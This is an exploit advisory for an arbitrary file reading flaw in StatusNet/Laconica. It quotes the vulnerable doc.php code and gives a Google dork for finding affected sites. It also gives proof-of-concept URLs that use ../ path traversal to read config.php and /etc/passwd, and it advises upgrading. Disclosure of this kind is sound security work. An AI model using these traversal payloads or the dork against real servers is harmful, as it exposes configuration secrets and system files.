+-------------------------------------------------------------------------------+
+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
+-------------------------------------------------------------------------------+
 
# Date:
    - 10/10/2013
 
# Exploit Author:
    - spiderboy
 
# Vendor Homepage:
    - http://status.net/
 
# Software Links:
    - http://status.net/laconica-0.7.4.tar.gz
    - http://status.net/statusnet-0.8.2.tar.gz
    - http://status.net/statusnet-0.9.0beta3.tar.gz
 
# Version:
    - Branch 0.7.X : <= 0.7.4
    - Branch 0.8.X : <= 0.8.2
    - Branch 0.9.X : <= 0.9.0beta3
 
# Tested on:
    - Unix/Linux
 
# Category:
    - Webapps
 
# Platform:
    - php
 
# Advisories :
    - http://status.net/wiki/Security_alert_0000002
    - http://osvdb.org/show/osvdb/95586
 
# Google Dork:
    - "It runs the StatusNet microblogging software, version 0.8.2"
 
# Vendor product description:
    - Free and Open Source social software
 
# Vulnerable code:
    - actions/doc.php:
    --------------------------------------------------------------------
    function handle($args)
    {
        parent::handle($args);
        $this->title    = $this->trimmed('title');
        $this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
        if (!file_exists($this->filename)) {
            $this->clientError(_('No such document.'));
            return;
        }
        $this->showPage();
    }
    --------------------------------------------------------------------
    [1] : No check on user-supplied parameter $this->title
 
# Proof of concept:
    - http://[host]/index.php?action=doc&title=../config.php
    - http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd
 
# Solution:
    - Upgrade to latest version : http://status.net/download